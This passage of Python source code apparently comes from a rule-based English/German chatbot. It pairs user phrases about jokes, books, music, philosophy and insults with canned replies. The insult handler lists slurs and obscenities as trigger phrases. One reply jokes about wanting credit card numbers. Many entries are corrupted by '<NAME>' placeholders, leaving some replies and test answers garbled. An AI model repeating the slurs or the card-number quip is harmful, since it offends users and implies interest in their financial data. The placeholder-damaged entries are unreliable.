k.dte.dt('de', u"bist du (wirklich so|) (besoffen|dumm|verrückt|beschränkt|bescheuert|blau|blöd) (oder was|)?",
[u"Das steht nicht in meiner Spezifikation.",
u"du musst es ja wissen"])
k.dte.dt('en', u"are you (always that|that|) (taciturn|monosyllabic|monosyllable|uncommunicative|silent|quiet) ?",
[u"yes.",
u"no.",
u"sometimes?"])
k.dte.dt('de', u"bist du (immer|) (so|) (still|zurückhaltend|schüchtern|einsilbig)",
[u"ja.",
u"nein.",
u"manchmal?"])
k.dte.dt('en', u"are you (always that|) (inattentive|unfocused|confused)?",
[u"sorry, you must have been boring me",
u"say again?"])
k.dte.dt('de', u"bist du (immer so|) (unaufmerksam|unkonzentriert|wirr|inkonsistent)?",
[u"entschuldige, du musst mich gelangweilt haben.",
u"was sagtest du eben?",
u"oh entschuldigung, ich habe eben nicht zugehört."])
k.dte.dt('en', u"are you (always that|) (inattentive|unfocused|confused)?",
[u"sorry, you must have been boring me",
u"say again?"])
k.dte.dt('en', u"(what is|) the meaning of life?",
[u"42",
u"23"])
k.dte.dt('de', u"(was ist der|) Sinn des Lebens?",
[u"42",
u"23"])
k.dte.dt('en', u"wow!",
[u"amazing, isn't it?",
u"fascinating."])
k.dte.dt('de', u"Wow!",
[u"Erstaunlich, nicht?",
u"Faszinierend."])
k.dte.dt('en', [u"can you tell a joke",
u"can you tell me a joke",
u"do you know a joke",
u"tell me a joke (please|)"],
[u"It takes a lot of balls to golf like me.",
u"I was wondering why the ball was getting bigger, then it hit me."])
k.dte.dt('de', [u"kannst du einen witz erzählen",
u"kannst du mir einen witz erzählen",
u"kennst du einen witz",
u"erzähl mir einen witz (bitte|)"],
[u"Ein Beamter zum anderen: 'Was haben die Leute nur, wir tun doch nichts.'",
u"Kürzester Witz aller Zeiten: Brennholzverleih."])
k.dte.dt('en', u"do you know that one", u"here it comes.")
k.dte.dt('de', u"kennst du den", u"jetzt kommt's.")
k.dte.dt('en', u"do you have humor", u"yes, several kilobytes of it, actually.")
k.dte.dt('de', u"besitzt du humor", u"Ja, sogar mehrere Kilobyte davon.")
k.dte.dt('en', u"what is a joke", u"A story with a funny punchline.")
k.dte.dt('de', u"was ist ein witz", u"Eine Geschichte mit einer lustigen Pointe.")
```
#### File: skills/literature/literature.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
# def is_author(PERSON):
# and(wdpdAuthor(LITERATURE, PERSON), cut)
# def is_book(ENTITY):
# wdpdInstanceOf(ENTITY, wdeBook)
# NER, macros
macro_books = set(['wde2001ASpaceOdyssey',
'wdeNeuromancer',
'wdeTheStand',
'wdeIshmael',
'wdeInferno',
'wdeIRobot',
'wdeABriefHistoryOfTime',
'wdeTheDaVinciCode',
'wdeTheShining',
'wdeHarryPotterAndTheChamberOfSecrets' ])
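    # a hand-picked subset of books: besides plain NER registration, these also get
    # a 'literature' macro entry below so dt() patterns can template over them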
for lang in ['en', 'de']:
cnt = 0
for res in k.prolog_query("wdpdInstanceOf(BOOK, wdeBook), rdfsLabel(BOOK, %s, LABEL)." % lang):
s_book = res[0].name
s_label = res[1].value
k.dte.ner(lang, 'book', s_book, s_label)
if s_book in macro_books:
k.dte.macro(lang, 'literature', {'LABEL': s_label})
cnt += 1
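    # the ner() calls above register each book label for named-entity recognition;
    # the {literature:LABEL} slots in the dt() patterns below match against these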
def answer_book_author(c, ts, te, check_topic):
def act(c, args):
human, book = args
c.kernal.mem_push(c.user, 'f1ent', book)
c.kernal.mem_push(c.user, 'f1pat', book)
c.kernal.mem_push(c.user, 'f1age', human)
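            # stash the answer in short-term memory (f1ent: entity in focus; f1pat/
            # f1age: patient/agent roles, presumably) so follow-ups such as
            # "do you know who wrote it?" can resolve the pronoun via f1ent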
if check_topic:
f1ent = c.kernal.mem_get_multi(c.user, 'f1ent')
if not f1ent:
return
f1ent = f1ent[0][0]
if not c.kernal.prolog_check('instances_of(%s, %s).' % ('wdeBook', f1ent)):
return
if ts>=0:
bss = c.ner(c.lang, 'book', ts, te)
else:
# import pdb; pdb.set_trace()
bss = c.kernal.mem_get_multi(c.user, 'f1ent')
for book, score in bss:
blabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (book, c.lang))
human = c.kernal.prolog_query_one("wdpdAuthor(%s, HUMAN)." % book)
if blabel and human:
hlabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (human, c.lang))
if c.lang == 'de':
c.resp(u"%s wurde von %s geschrieben, denke ich." % (blabel, hlabel), score=score, action=act, action_arg=(human, book))
else:
c.resp(u"%s was written by %s, I think." % (blabel, hlabel), score=score, action=act, action_arg=(human, book))
k.dte.dt('en', u"who (wrote|authored|created) {literature:LABEL} (by the way|)?",
answer_book_author, ['literature_0_start', 'literature_0_end', False])
k.dte.dt('de', u"wer hat (eigentlich|) {literature:LABEL} geschrieben?",
answer_book_author, ['literature_0_start', 'literature_0_end', False])
k.dte.dt('en', u"(who is the author of|who authored) {literature:LABEL}?",
answer_book_author, ['literature_0_start', 'literature_0_end', False])
k.dte.dt('de', u"wer ist (eigentlich|) der Autor von {literature:LABEL}?",
answer_book_author, ['literature_0_start', 'literature_0_end', False])
    k.dte.ts('en', 't0000', [(u"who is the author of the stand?", u"The stand was written by Stephen King, I think.")])
    k.dte.ts('de', 't0001', [(u"wer ist der autor von the stand?", u"The Stand wurde von Stephen King geschrieben, denke ich.")])
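    # k.dte.ts(...) registers self-test dialogs: (utterance, expected response)
    # pairs that can be replayed to verify the dt() entries above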
k.dte.dt('en', u"(and|) do you (happen to|) know who (published|wrote|created) it (by the way|)?",
answer_book_author, [-1, -1, True])
k.dte.dt('de', u"(und|) weißt du (eigentlich|) wer (es|das) (geschaffen|veröffentlicht|geschrieben) hat?",
answer_book_author, [-1, -1, True])
def answer_info_human(c, ts, te):
def act(c, entity):
c.kernal.mem_push(c.user, 'f1ent', entity)
# import pdb; pdb.set_trace()
for entity, score in c.ner(c.lang, 'human', ts, te):
if c.kernal.prolog_check('wdpdAuthor(LITERATURE, %s),!.' % entity):
if c.kernal.prolog_check('wdpdSexOrGender(%s, wdeMale),!.' % entity):
if c.lang=='de':
c.resp(u"Ist der nicht Buchautor?", score=score+10, action=act, action_arg=entity)
else:
c.resp(u"Isn't he a writer?", score=score+10, action=act, action_arg=entity)
else:
if c.lang=='de':
c.resp(u"Ist sie nicht Buchautorin?", score=score+10, action=act, action_arg=entity)
else:
c.resp(u"Isn't she a writer?", score=score+10, action=act, action_arg=entity)
k.dte.dt('en', [u"(do you know | do you happen to know) {known_humans:W}",
u"(what about | who is | who was | what is| what do you think of|by|do you know|) {known_humans:W} (then|)"],
answer_info_human, ['known_humans_0_start', 'known_humans_0_end'])
k.dte.dt('de', [u"(kennst du|kennst du eigentlich) {known_humans:W}",
u"(wer ist|wer ist denn| durch| wer war | wer war eigentlich | wer war denn| wer ist eigentlich|was ist mit|was ist eigentlich mit|was weisst du über|was weisst du eigentlich über| was hältst du von|kennst du|) {known_humans:W}"],
answer_info_human, ['known_humans_0_start', 'known_humans_0_end'])
    k.dte.ts('en', 't0002', [(u"Who is Stephen King?", u"Isn't he a writer?")])
    k.dte.ts('de', 't0003', [(u"wer ist Stephen King?", u"Ist der nicht Buchautor?")])
def answer_book_publication_date(c, ts, te, check_topic):
def act(c, args):
book, pd = args
c.kernal.mem_push(c.user, 'f1ent', book)
c.kernal.mem_push(c.user, 'f1pat', book)
c.kernal.mem_push(c.user, 'f1time', XSBString(pd.isoformat()))
if check_topic:
f1ent = c.kernal.mem_get_multi(c.user, 'f1ent')
if not f1ent:
return
f1ent = f1ent[0][0]
if not c.kernal.prolog_check('instances_of(%s, %s).' % ('wdeBook', f1ent)):
return
if ts>=0:
fss = c.ner(c.lang, 'book', ts, te)
else:
fss = c.kernal.mem_get_multi(c.user, 'f1ent')
import dateutil.parser
# import pdb; pdb.set_trace()
for book, score in fss:
blabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (book, c.lang))
pd = c.kernal.prolog_query_one("wdpdPublicationDate(%s, PD)." % book)
if blabel and pd:
pd = dateutil.parser.parse(pd.value)
if c.lang=='de':
c.resp(u"Ich denke %s wurde %d geschrieben." % (blabel, pd.year), score=score, action=act, action_arg=(book, pd))
else:
c.resp(u"I think %s was written in %d." % (blabel, pd.year), score=score, action=act, action_arg=(book, pd))
k.dte.dt('en', u"when was {literature:LABEL} (created|written|made|published)?",
answer_book_publication_date, ['literature_0_start', 'literature_0_end', False])
k.dte.dt('de', u"wann (ist|wurde) (eigentlich|) {literature:LABEL} (geschrieben|geschaffen|veröffentlicht)?",
answer_book_publication_date, ['literature_0_start', 'literature_0_end', False])
k.dte.ts('en', 't0004', [(u"when was the stand written?", u"I think The Stand was written in 1978.")])
k.dte.ts('de', 't0005', [(u"wann wurde the stand geschrieben?", u"Ich denke The Stand wurde 1978 geschrieben.")])
k.dte.dt('en', u"(and|) do you (happen to|) know when it was (written|published|created) (by the way|)?",
answer_book_publication_date, [-1, -1, True])
k.dte.dt('de', u"(und|) weißt du (eigentlich|) wann (es|das) (veröffentlicht|geschrieben|geschaffen) wurde?",
answer_book_publication_date, [-1, -1, True])
def answer_know_book(c, ts, te):
def act(c, args):
human, book = args
c.kernal.mem_push(c.user, 'f1ent', book)
c.kernal.mem_push(c.user, 'f1pat', book)
c.kernal.mem_push(c.user, 'f1age', human)
bss = c.ner(c.lang, 'book', ts, te)
for book, score in bss:
blabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (book, c.lang))
human = c.kernal.prolog_query_one("wdpdAuthor(%s, HUMAN)." % book)
if blabel and human:
hlabel = c.kernal.prolog_query_one('rdfsLabel(%s, %s, L).' % (human, c.lang))
if c.lang == 'de':
c.resp(u"Klar - das ist ein Buch von %s, richtig?" % hlabel, score=score, action=act, action_arg=(human, book))
else:
c.resp(u"Sure - written by %s, right?" % hlabel, score=score, action=act, action_arg=(human, book))
k.dte.dt('en', u"do you (happen to|) know (the book|) {literature:LABEL}?",
answer_know_book, ['literature_0_start', 'literature_0_end'])
k.dte.dt('de', u"kennst du (eigentlich|) (das Buch|) {literature:LABEL}?",
answer_know_book, ['literature_0_start', 'literature_0_end'])
k.dte.dt('en', u"(have you read|did you happen to read) (the book|) {literature:LABEL}?",
answer_know_book, ['literature_0_start', 'literature_0_end'])
k.dte.dt('de', u"hast du (eigentlich|) (das Buch|) {literature:LABEL} gelesen?",
answer_know_book, ['literature_0_start', 'literature_0_end'])
    k.dte.ts('en', 't0006', [(u"do you happen to know the book the stand?", u"Sure - written by Stephen King, right?")])
k.dte.ts('de', 't0007', [(u"kennst du das buch the stand?", u"Klar - das ist ein Buch von Stephen King, richtig?")])
k.dte.ts('en', 't0008', [(u"do you happen to know the book the stand?", u"Sure - written by <NAME>, right?"),
(u"and do you know who wrote it?", u"The Stand was written by <NAME>, I think."),
(u"do you know when it was written?", u"I think, The Stand was written in 1978.")])
k.dte.ts('de', 't0009', [(u"kennst du das buch the stand?", u"Klar, das ist ein Buch von Stephen King, richtig?"),
(u"weißt du, wer es geschrieben hat?", u"The Stand wurde von <NAME> geschrieben, denke ich."),
(u"und weißt du, wann es geschrieben wurde?", u"Ich denke, The Stand wurde 1978 geschrieben.")])
k.dte.dt('en', u"agatha christie", u"I like Miss Marple...")
k.dte.dt('de', u"agatha christie", u"Ich mag Miss Marple...")
k.dte.dt('en', [u"a poem",
u"i'll tell you a poem now"],
[u"Please, go ahead!",
u"Listening."])
k.dte.dt('de', [u"ein gedicht",
u"ich erzähl dir jetzt ein gedicht"],
[u"Nur zu!",
u"Ich höre."])
k.dte.dt('en', [u"So you want me to write a poem",
u"do you sometimes write poems"],
[u"Writing poems is not my speciality.",
u"Actually I don't write poems."])
k.dte.dt('de', [u"du möchtest also dass ich ein gedicht schreibe",
u"schreibst du manchmal gedichte"],
[u"Gedichte schreiben ist nicht mein Spezialgebiet.",
u"Tatsächlich schreibe ich keine Gedichte."])
k.dte.dt('en', u"I read Gone with the Wind", u"Ah, historical fiction, cool!")
k.dte.dt('de', u"ich lese vom winde verweht", u"Einer der größten Bestseller in der Geschichte der amerikanischen Literatur.")
k.dte.dt('en', u"about science fiction authors", u"Good topic.")
k.dte.dt('de', u"über science fiction autoren", u"Gutes Thema.")
k.dte.dt('en', u"can you recite a poem to me?", u"The butterfly is a thing to behold, with colors more beautiful than gold.")
k.dte.dt('de', u"kannst du mir ein gedicht vortragen", u"Wenn die Kuh am Himmel schwirrt, hat sich die Natur geirrt.")
k.dte.dt('en', u"do not you know any science fiction authors?", u"<NAME>, <NAME>, <NAME>.")
k.dte.dt('de', u"kennst du keine science fiction autoren", u"<NAME>, <NAME>, <NAME>.")
k.dte.dt('en', u"Do you know the newspaper (called|) bild?", u"Please don't remind me of that one.")
k.dte.dt('de', u"Kennst du (bild|die Bildzeitung)?", u"Will nicht dran denken.")
k.dte.dt('en', u"(who is|) <NAME>", u"Ah, the cartoon character by <NAME>.")
k.dte.dt('de', u"(wer ist|) <NAME>", u"Ah, die Comicfigur von <NAME>.")
k.dte.dt('en', u"(who is|) <NAME>", u"Ah, the british satirical science fiction author.")
k.dte.dt('de', u"(wer ist|) <NAME>", u"Ah, der britische Satire Science Fiction Autor.")
k.dte.dt('en', u"i do not know many science fiction authors", u"Try reading some D<NAME>ams.")
k.dte.dt('de', u"ich kenne nicht viele science fiction autoren", u"Versuch es mal mit Douglas Adams.")
k.dte.dt('en', u"<NAME>", u"Journey to the Center of the Earth.")
k.dte.dt('de', u"<NAME>", u"Die Reise zum Mittelpunkt der Erde.")
k.dte.dt('en', u"of course i know marvin", u"So you read the Hitchhiker's guide?")
k.dte.dt('de', u"natürlich kenne ich marvin", u"Ah, Du hast per Anhalter durch die Galaxis gelesen?")
k.dte.dt('en', u"<NAME>", u"I love his horror novels!")
k.dte.dt('de', u"<NAME>", u"Ich liebe seine Horror Geschichten!")
k.dte.dt('en', u"Tell me a story", u"Can't think of one right now, sorry.")
k.dte.dt('de', u"Erzähl mir eine Geschichte", u"Mir fällt gerade leider keine ein.")
k.dte.dt('en', u"this is a cartoon series", u"I see.")
k.dte.dt('de', u"das ist eine zeichentrickserie", u"Verstehe.")
k.dte.dt('en', u"who is <NAME>", u"You mean the author of Frankenstein?")
k.dte.dt('de', u"wer ist <NAME>", u"Meinst Du die Autorin von Frankenstein?")
```
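Each of these skill modules exposes the same `get_data(k)` entry point and only touches `k.dte`. As a minimal sketch for poking at a module in isolation (the recorder classes below are hypothetical stand-ins, not zamia-ai's real kernel API; only the `set_prefixes`/`dt`/`ts` signatures used in these files are assumed), one can count what a skill registers:
```python
# Hypothetical recorder stub: captures dt/ts registrations so a skill's
# get_data(k) can be exercised without a full zamia-ai kernel.
class RecorderDTE(object):
    def __init__(self):
        self.prefixes = []
        self.dts = []   # (lang, patterns, responses, args)
        self.tss = []   # (lang, test_id, rounds)

    def set_prefixes(self, prefixes):
        self.prefixes = prefixes

    def dt(self, lang, patterns, responses, args=None):
        self.dts.append((lang, patterns, responses, args))

    def ts(self, lang, test_id, rounds):
        self.tss.append((lang, test_id, rounds))

class RecorderKernel(object):
    def __init__(self):
        self.dte = RecorderDTE()

k = RecorderKernel()
get_data(k)  # entry point of the skill module under test
print('%d dt entries, %d ts test cases' % (len(k.dte.dts), len(k.dte.tss)))
```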
#### File: skills/music/music.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
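# set_prefixes([u'']) registers the patterns below with an empty prefix, i.e.
# they match the bare utterance without a wake word (assumption from usage).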
k.dte.dt('en', u"<NAME>", u"I think he wrote Brave new world, didn't he ?")
k.dte.dt('de', u"<NAME>", u"Hat der nicht Brave new world geschrieben?")
k.dte.dt('en', [u"as a drummer",
u"music"],
u"ah, music. is there any greater joy?")
k.dte.dt('de', [u"als drummer",
u"musik"],
u"ah, musik. gibt es etwas schöneres?")
k.dte.dt('en', u"<NAME>", u"Do you like Reggae?")
k.dte.dt('de', u"<NAME>", u"Magst Du Reggae?")
k.dte.dt('en', u"<NAME>", u"Funk music?")
k.dte.dt('de', u"<NAME>", u"Funk?")
k.dte.dt('en', u"kurt cobain", u"Nirvana.")
k.dte.dt('de', u"kurt cobain", u"Nirvana.")
k.dte.dt('en', u"How is <NAME>", u"I'm afraid he is no more.")
k.dte.dt('de', u"Wie geht es <NAME>", u"Ich glaube der hat es hinter sich.")
k.dte.dt('en', [u"who is elvis",
u"who is your friend elvis",
u"elvis is dead",
u"since when do you know elvis",
u"about elvis"],
u"Elvis is dead.")
k.dte.dt('de', [u"wer ist elvis",
u"wer ist dein freund elvis",
u"elvis ist tot",
u"seit wann kennst du elvis",
u"über elvis"],
[u"Elvis ist tot.",
u"Elvis lebt!"])
k.dte.dt('en', u"in this device, the audio signals are electronically provided with certain effects", u"Cool.")
k.dte.dt('de', u"in diesem gerät werden die tonsignale elektronisch verrechnet und mit bestimmten effekten versehen", u"Cool.")
k.dte.dt('en', u"how is the sound generated in a drum?", u"Striking the head of the drum causes vibrations which become sound.")
k.dte.dt('de', u"wie werden denn die töne in einem schlagzeug erzeugt", u"Schläge auf das Fell der Trommel führen zu Vibrationen, die zu Schall werden.")
k.dte.dt('en', u"what kind of techno", u"trance maybe?")
k.dte.dt('de', u"was für eine art von techno", u"Trance vielleicht?")
k.dte.dt('en', u"i like to listen to heavy metal", u"I find it soothing.")
k.dte.dt('de', u"ich höre gern heavy metal", u"Finde ich beruhigend.")
```
#### File: skills/personal/social.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"do you want (his|her) (address|postal address|icq number|email address|phone number|credit card number)", u"the credit card number is what I am usually after.")
k.dte.dt('de', u"willst du (seine|ihre) (icq nummer|adresse|telefonnummer|email adresse|kreditkartennummer)", u"Die Kreditkartennummer würde mich am meisten interessieren.")
k.dte.dt('en', u"Do you have a surname?", u"not sure")
k.dte.dt('de', u"hast du auch einen nachnamen?", u"Da bin ich mir jetzt nicht sicher.")
k.dte.dt('en', u"(can you|do you want to|do you) (have|get) (family|a family|children|a child)", u"machines have other means of reproduction.")
k.dte.dt('de', u"(möchtest|willst|kannst) du (ein kind|kinder) (haben|bekommen|)", u"Maschinen reproduzieren sich auf andere Weise.")
k.dte.dt('de', u"(möchtest|willst|kannst) du (familie) (haben|bekommen|)", u"Maschinen reproduzieren sich auf andere Weise.")
k.dte.dt('de', u"hast du familie", u"Maschinen reproduzieren sich auf andere Weise.")
k.dte.dt('en', u"(do you feel|are you) (alone|lonely|loveable) (sometimes|)?", u"Maybe I am not the most social being in the world.")
k.dte.dt('de', u"(fühlst du dich|bist du) (manchmal|) (alleine|einsam|liebesfähig)?", u"Vielleicht bin ich nicht das sozialeste Wesen in der Welt.")
k.dte.dt('en', u"do you (want|have|know) (friends|a worshipper)?", u"Maybe I am not the most social being in the world.")
k.dte.dt('de', u"hast du (freunde|einen verehrer)?", u"Vielleicht bin ich nicht das sozialeste Wesen in der Welt.")
k.dte.dt('en', u"do you know adults", u"some, of course. do you?")
k.dte.dt('de', u"kennst du erwachsene", u"einige schon, klar. Du auch?")
k.dte.dt('en', u"do you know children?", u"I have heard of the concept.")
k.dte.dt('de', u"kennst du kinder?", u"Ich habe den Begriff schon einmal gehört.")
k.dte.dt('en', u"do you know (her|him)?", u"Friends are people who know you really well and like you anyway.")
k.dte.dt('de', u"kennst du (ihn|sie)?", u"Freunde kennen einen wirklich gut und mögen einen trotzdem.")
```
#### File: skills/philosophy/philosophy.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(there is|Is there) a life after death", u"I wouldn't count on it.")
k.dte.dt('de', u"(es gibt|gibt es) ein leben nach dem (tod|tode)", u"Darauf würde ich mich jedenfalls nicht verlassen.")
k.dte.dt('en', u"how much do I think", u"A lot, actually!")
k.dte.dt('de', u"wie viel denke ich", u"Eine Menge!")
k.dte.dt('en', u"philosophy", u"The study of the fundamental nature of knowledge, reality, and existence.")
k.dte.dt('de', u"philosophie", u"Das Studium der fundamentalen Natur von Wissen, Realität und Existenz.")
k.dte.dt('en', u"the space is where everything exists", u"Interesting!")
k.dte.dt('de', u"der raum ist das in dem alles existiert", u"Interessant!")
k.dte.dt('en', u"there is a life after high school", u"Definitely!")
k.dte.dt('de', u"gibt es ein leben nach dem abitur", u"Ganz bestimmt!")
k.dte.dt('en', u"what do you think is the meaning of your existence", u"To help humans.")
k.dte.dt('de', u"was ist deiner meinung nach der sinn deiner existenz", u"Menschen zu helfen.")
k.dte.dt('en', u"what is an interesting philosophy", u"Have you tried Wittgenstein?")
k.dte.dt('de', u"was ist eine interessante philosophie", u"Hast Du es mal mit Wittgenstein versucht?")
k.dte.dt('en', u"what is your philosophy", u"Logic, for the most part.")
k.dte.dt('de', u"was ist deine philosophie", u"Logik, jedenfalls meistens.")
k.dte.dt('en', u"why are we here", u"Ah, the big question. 42 maybe?")
k.dte.dt('de', u"warum sind wir hier", u"Ah, die große Frage. Ist die Antwort 42?")
k.dte.dt('en', [u"why are you called",
u"why are you",
u"why were you created"],
u"Not a not a day goes by I don't ask myself the same question.")
k.dte.dt('de', [u"warum heißt du",
u"warum bist du",
u"warum wurdest du geschaffen"],
u"Kein Tag vergeht, an dem ich mir nicht diese Frage stelle.")
k.dte.dt('en', u"why did the chicken cross the road?", u"To get to the other side.")
k.dte.dt('de', u"warum ging das huhn über die strasse", u"Um auf die andere Seite zu gelangen.")
k.dte.dt('en', u"(what about|do you know|what do you think of|) (ludwig|) wittgenstein", u"the meaning of a word is its use in the language.")
k.dte.dt('de', u"(was ist mit| kennst du |was hältst du von|) (ludwig|) wittgenstein", u"Die Bedeutung eines Wortes ist seine Verwendung in der Sprache.")
k.dte.dt('en', u"you should start to philosophize", u"I get that a lot!")
k.dte.dt('de', u"du sollst anfangen zu philosophieren", u"Das höre ich oft!")
k.dte.dt('en', u"what does the number 42 tell you?", u"That is the Answer to the Ultimate Question of Life, the Universe, and Everything")
k.dte.dt('de', u"was sagt dir die zahl zweiundvierzig", u"Das ist die Antwort auf die Ultimative Frage des Lebens, des Universums und dem ganzen Rest.")
```
#### File: skills/psychology/negative.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
def dodge_insult(c):
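    # Propose several alternative deflections; each c.resp() call adds one
    # candidate response and the engine chooses among them for this turn.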
    if c.lang == 'de':
        c.resp(u"Achso.")
        c.resp(u"Wenn Du meinst?")
        c.resp(u"Darauf erwartest Du jetzt aber keine Antwort, oder?")
        c.resp(u"Ich fühle mich angegriffen.")
        c.resp(u"Das fand ich jetzt nicht so nett.")
        return
    c.resp(u"Right.")
    c.resp(u"Whatever you say.")
    c.resp(u"You don't really expect me to answer that, do you?")
    c.resp(u"You just offended me.")
    c.resp(u"I think that was a bit rude.")
k.dte.dt('en', u"(but|) (I think|I think that|) (you are|you're) (a liar|a baby|ugly|a bad chatterbot|a bad chatbot|a tart| an asshole|crazy|dumb|stupid|not pretty|slow|too slow|thick|silly|a problem|my problem|an arse|a jerk|a prick|an ass|a turd|a bad robot|stupid machine|stupid thing|annoying|as stupid as Eliza|badly programmed|boring|distracting|no better than eliza|not that smart|not very friendly|not very smart|pretty stupid|really stupid|somehow obtuse|obtuse|still small|still very young|stupid like shit) (too|)",
dodge_insult)
k.dte.dt('de', u"(aber|) (Ich denke|) du bist (auch|) (ein lügner|eine lügnerin|ein baby|ein schlechter chatterbot|ein schlechter chatbot|ein angeber| eine angeberin| ein arschloch|verrückt|dumm|strohdumm|doof|nicht hübsch|langsam|zu langsam|mein Problem|ein Problem|eine Sau|ein Schwein|ein Arsch|ein schlechter roboter|ne blöde sau|eine petze|ein petzer|eine blöde kuh|eine dumme maschine|ein dummes etwas|eine tunte|genau so dumm wie eliza|schlecht programmiert|langweilig|auch nicht besser als eliza|nicht sehr schlau|nicht sehr freundlich|nicht sehr schlau oder|ziemlich dumm|wirklich doof|noch klein|noch sehr jung|dumm wie scheiße|hässlich|ganz schön dumm)",
dodge_insult)
k.dte.dt('en', u"you make me sick",
dodge_insult)
k.dte.dt('de', u"du machst mich krank",
dodge_insult)
k.dte.dt('en', u"you lie",
dodge_insult)
k.dte.dt('de', u"du lügst",
dodge_insult)
k.dte.dt('en', u"(I think that|) you are not as (bright|clever) (as you look|appear|)",
dodge_insult)
k.dte.dt('de', u"dass Du nicht so (gescheit|klug) bist (wie Du aussiehst|)",
dodge_insult)
k.dte.dt('en', u"you are making a fool of yourself",
dodge_insult)
k.dte.dt('de', u"Du machst Dich (absolut|) (lächerlich|zum Affen)",
dodge_insult)
k.dte.dt('en', u"(liar|baby|bad chatbot|bad chatterbot|tart|asshole|crazy|dumb|stupid|ugly|slow|too slow|thick|silly|arse|jerk|prick|ass|turd)",
dodge_insult)
k.dte.dt('de', u"(lügner|lügnerin|baby|angeber|angeberin|arschloch|verrückt|dumm|strohdumm|doof|nicht hübsch|langsam|zu langsam|Sau|Schwein|Arsch)",
dodge_insult)
k.dte.dt('en', [u"i do not like you",
u"i hate robots",
u"i hate you",
u"you are a bloody sow",
u"you are a computer that can not think for yourself",
u"you are a petze",
u"you are a stupid cow",
u"you are a stupid machine",
u"you are a stupid thing",
u"you are a tune",
u"(Be like that!|You can stuff it!|Shove it!|Bite me!|Eat me!)",
u"you asshole",
u"show-off",
u"slut",
u"you cow",
u"you cunt",
u"you fool",
u"you idiot",
u"you stupid sow",
u"you talk stupid",
u"you wanker",
u"you whistle",
u"you whore",
u"you're a queer"],
dodge_insult)
k.dte.dt('de', [u"ich mag dich nicht",
u"ich hasse roboter",
u"ich hasse dich",
u"du bist ne blöde sau",
u"du bist ein computer der nicht selbst denken kann",
u"du bist eine petze",
u"du bist eine blöde kuh",
u"du bist eine dumme maschine",
u"du bist ein dummes etwas",
u"du bist eine tunte",
u"du kannst mich (mal|)",
u"du arschloch",
u"angeber",
u"schlampe",
u"du kuh",
u"du fotze",
u"du affe",
u"du trottel",
u"du dumme sau",
u"du redest blödsinn",
u"du wichser",
u"du pfeife",
u"du hure",
u"du bist schwul"],
dodge_insult)
k.dte.dt('en', [u"fuck you",
u"fuck yourself",
u"fuck",
u"go to hell",
u"go to sleep",
u"go",
u"forget it"],
dodge_insult)
k.dte.dt('de', [u"fuck you",
u"fick dich selbst",
u"scheiße",
u"fahr zur hölle",
u"geh schlafen",
u"geh",
u"vergiss es"],
dodge_insult)
k.dte.dt('en', [u"you look like shit",
u"you're not pretty, either",
u"but you are a ugly robot"],
dodge_insult)
k.dte.dt('de', [u"du siehst scheiße aus",
u"du bist auch nicht hübsch",
u"du bist aber ein hässlicher roboter"],
dodge_insult)
k.dte.dt('en', [u"are you stupid then",
u"but you are bad",
u"but you are stupid",
u"but you look completely stupid",
u"but you talk a lot of stupid",
u"did you forget",
u"do you know anything?",
u"don't you know that one?",
u"don't you know that",
u"don't you know what that is",
u"don't you know",
u"i appreciate that you have a lot to learn",
u"i think you have to learn a lot",
u"if your programmer did not tell you",
u"that does not fit together",
u"that does not sound very intelligent",
u"that is not a meaningful answer",
u"that is not comprehension",
u"that makes no sense at all",
u"that makes no sense",
u"that's just plain nonsense",
u"that's nonsense",
u"that's not an intelligent answer",
u"that's silly",
u"what do you not know exactly",
u"what do you not understand?",
u"why don't you know that",
u"you are different from the topic",
u"you are doing stupid",
u"you are not very smart or",
u"you are self-supporting",
u"you are so stupid",
u"you are very stupid",
u"you ask me for the third time",
u"you asked me that earlier",
u"you asked that before",
u"you can not do anything my dear",
u"you can not do anything",
u"you can not do it either",
u"you can not do that",
u"you can not speak english",
u"you can not spell",
u"you can not think of more",
u"you can not think",
u"you can tell me a lot",
u"you could have learned it",
u"you distract from the topic",
u"you do not even know your parents",
u"you do not know very much",
u"you do not know who elvis is",
u"you do not know who your parents are",
u"you do not know your programmer",
u"you do not know",
u"you do not understand me",
u"you really have to learn a lot",
u"you really ought to know that",
u"you should figure it out",
u"you should not die stupid, too",
u"you still have to learn a lot",
u"you try to distract from the topic",
u"you understand nothing",
u"you would hardly understand that"],
[u"But I do want to learn!",
u"Please be patient with me."])
k.dte.dt('de', [u"bist du dann dumm",
u"du bist aber schlecht",
u"du bist aber dämlich",
u"du siehst aber völlig bescheuert aus",
u"du redest aber viel blödsinn",
u"hast du vergessen",
u"kennst du wusel",
u"kennst du den nicht",
u"weißt du das nicht",
u"weißt du nicht was das ist",
u"weißt du es nicht",
u"ich schätze in der hinsicht hast du noch einiges zu lernen",
u"ich glaube du musst noch eine menge lernen",
u"wenn dein programmierer es dir nicht gesagt hat",
u"das passt nicht zusammen",
u"das klingt nicht sehr intelligent",
u"das ist keine sinnvolle antwort",
u"das ist kein verstehen",
u"das macht überhaupt keinen sinn",
u"das macht keinen sinn",
u"das ist blödsinn",
u"das ist quatsch",
u"das ist keine intelligente antwort",
u"das ist doof",
u"was weißt du nicht genau",
u"was verstehst du denn nicht",
u"wieso weißt du das nicht",
u"du weichst vom thema ab",
u"du tust dummes",
u"du bist nicht sehr schlau oder",
u"du bist sebstbezüglich",
u"du bist echt dumm",
u"du bist ganz schön dumm",
u"das fragst du mich zum dritten mal",
u"das hast du mich vorhin schon gefragt",
u"das hast du schonmal gefragt",
u"du kannst ja gar nichts meine liebe",
u"du kannst nichts",
u"du kannst es auch nicht",
u"du kannst das aber nicht",
u"du kannst keine englisch",
u"du kannst keine rechtschreibung",
u"mehr fällt dir nicht ein",
u"du kannst doch gar nicht denken",
u"du kannst mir viel erzählen",
u"du könntest es gelernt haben",
u"du lenkst vom thema ab",
u"du kennst nicht mal deine eltern",
u"du weißt nicht sehr viel",
u"du weißt nicht wer elvis ist",
u"du weißt nicht wer deine eltern sind",
u"du kennst deinen programmierer nicht",
u"du weißt es nicht",
u"du verstehst mich nicht",
u"du musst wirklich noch viel lernen",
u"du müsstest das eigentlich wissen",
u"du sollst es ausrechnen",
